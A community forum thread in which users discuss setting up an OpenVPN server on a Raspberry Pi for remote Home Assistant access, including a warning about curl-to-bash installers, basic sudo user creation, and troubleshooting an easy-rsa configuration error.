@Robbrad, Thanks for this, very interesting. Naturally it raises a couple of questions…
I have read through the first guide and it is indeed very well written and I kind of followed most of it (certainly enough to know what was going on) but:
It refers specifically to Ubuntu, I use hassio on a Pi and I am pretty old-school (emphasis on the ‘old’ ) with all my IT experience being IBM, Microsoft and the like. all this Linux, Python etc. is very new to me.
As I was reading the guide, at the back of my mind I was thinking ‘what a lot of steps, any one of which done wrong might compromise what I am trying to achieve. Surely something that can be written down in such concise instructions could be wrapped up in an idiot proof script of some sort?’.
A combination of those two lines of thought got me searching the web. I found lots of tutorials for setting up a VPN server on a Pi, in fact it seems that this is one of those projects that many tout the Pi as being ideal for.
Specifically I found PiVPN (based on OpenVPN) which does seem to wrap almost all of the set up into a script. I also found a few tutorials for setting up PiVPN and as well, it is hosted on GitHub. All of which led me to think it could be a legitimate option.
I am not asking for actual personal advice as I know you can’t give that on a user by user basis but does it seem reasonable to you to go down that route?
Firstly fantastic to hear and to be honest this is the objective I set out to do - just get people to dip their toe into this and think about what they wanted / understand how a VPN was a sound choice - yep following the guide will get results but exploration is also recommended.
Couple of extra diagrams to help with the above explination
Your correct there are a lot of steps - but until you forward port to the VPN server on the router, you can’t really go wrong - I would say you can just uninstall OpenVPN / purge it - or start over - I’d always recommend if people are running stable Pi builds, to img there sd card to a Hard drive for backup - so it can be flashed back at the point of failure - its the same process as initially flashing the SD card for the Pi but in reverse. SD to Img file.
I started writing out all the steps but just found myself pretty much copying Digital Ocean - which I didn’t feel was right as this was the guide I followed.
Correct - Its written for Ubuntu - but OpenVPN runs on many systems - so choose the one that’s right for you. FYI Raspbian which runs on a PI is based on Debian - Ubuntu is also based on Debian - so the commands should all work.
Pi’s do make great VPN servers - but be aware that it needs to run some well maintained VPN software with regular updates and fixes - PiVPN looks very good - but I’d really want to do the steps myself so I knew what it was doing, I had a quick look at the scrips it uses and it just automates a lot of the commands.
Overall this is something that takes time to setup but is worth it once done - as you will be able to do so much with it with some security piece of mind (in that only the VPN server is open on your router)
The PiVPN site tells you to install it by downloading a script via curl and directly executing it by piping it into a bash shell.
There is no verification that what you downloaded is actually what you intended, or that it has not been compromised in some way. I would not trust any site that tried to get you to do this, let alone something related to security.
At the very least you should download the code first and inspect it manually to make sure it does something like you expect, and doesn’t download anything else.
@Robbrad
Rob, i just want to say thank you for taking the time to put this together and sharing it with the community.
I recently learnt how to set up reverse proxy and configured my set up as such.
However, it seems this is not sufficient and vpn may be the way forward.
I echo this.
This community is wonderful, some extremely helpful people and I wouldn’t have my HA system running as well as it is today if it weren’t for the help I’ve had here. But what you have done is avoid speaking down to people who don’t have the same skill set as you. something that is sometimes lacking here. Sometimes too many assumptions are made about what the questioner knows about or understands making the reply appear condescending however helpful their intent.
@klogg
Agreed, on my reverse proxy write up i start with a short rant exactly about some individuals’ attitude; but anyway, the reality is that most people are genuinely helpful and kind.
Ok, I am going to try and set aside some time to do this, it seems like I have nothing to lose - until I open that port!
So I am reading the guide again and I have a question (and I am only at the pre-requisites!!!) but I think it is a simple one. It points you to a guide for creating the appropriate user (I told you Linux wasn’t my thing!) and setting up the firewall but that guide also talks about adding public key authentication. Is that appropriate in this case?
No problem - depending on where you plan to do this - as long as your not logging in as root you probably already have a SUDO user - and it will be the user you use for your PI. If not and it is root (scary) then - login as root and do the following
use commands : adduser <username>
Follow the wizard then do usermod -aG sudo <username>
That’s all you need to do - SSH key exchange isn’t required at this stage nor is the firewall stuff
I would then login as this user and use for all activity on the PI from that point - don’t do things as root.
A fantastic write up - thank you for taking the time to do it! I’m particularly interested in the 2FA aspect of this and look forward to setting that up.
One question from me on the below. I believe this means that you’ll still then need a port forward straight to HA for some components then correct? Which still leaves us open to someone finding the login page as you described in the OP? In other words, to “lock it down” but still retain remote access, one would need to forgo the use of any services that need pointed at home assistant directly, i.e. Google Assistant. And I realize that “lock it down” and “retain remote access” inherently contradict each other a bit lol. Apologies if this isn’t the right place for the question, the conversation just led me to consider this.
How is the Google Assistant configured? - do you current forward a port on your router to HA for Google to access your HA server?
UPDATE I just read the component page for Google Assistant - that’s really not the best, shame it works in that way. Let me do some more reading - it might be ok, or maybe there is another way this component can connect
Part of setting up the component involves entering your URL, so it points to my.domain.com which is fed via port forward to HA. In my case I have nginx in the middle of that, but I think the concept is still the same. Any component that requires you to enter your HA URL I am assuming isn’t going to work through a VPN and thus still require an open port straight to HA. Again, don’t mean to derail here, just wanted to make sure it’s clear and I’m not missing anything. I feel like I’ve seen a handful of components that work like this, but Google Assistant is the one that stands out and I’m sure is fairly widely used.
Thanks @Robbrad! I had setup Google Assistant before this was made available, so might be time to switch over. I see it’s free to use for now. I’d been avoiding any subscriptions like the plague, but one that supports this great platform and community might be worth breaking the rule! And I suppose you can’t put a price on security!
I had seen this and I was a little bummed it cost money - but HA has given me so much value it’s worth the money if it supports that - it also works very well eg - its FAST
I was really hoping not to have to ask anything else but I have hit a small problem. Perhaps you can help, perhaps it’s Pi thing?
When trying to build the certificate authority (Step 4) and after the source vars command I get:
No /home/pi/OpenVPN-ca/openssl.cnf file could be found
Further invocations will fail
the next line of output is the expected:
NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/sammy/openvpn-ca/keys
but
./build-ca
fails with the same file could not be found error.
I know you are not here to support the Digital Ocean docs but just in case it is something simple or obvious…
For the record, I have been through the process twice, both times with a fresh install of Raspbian.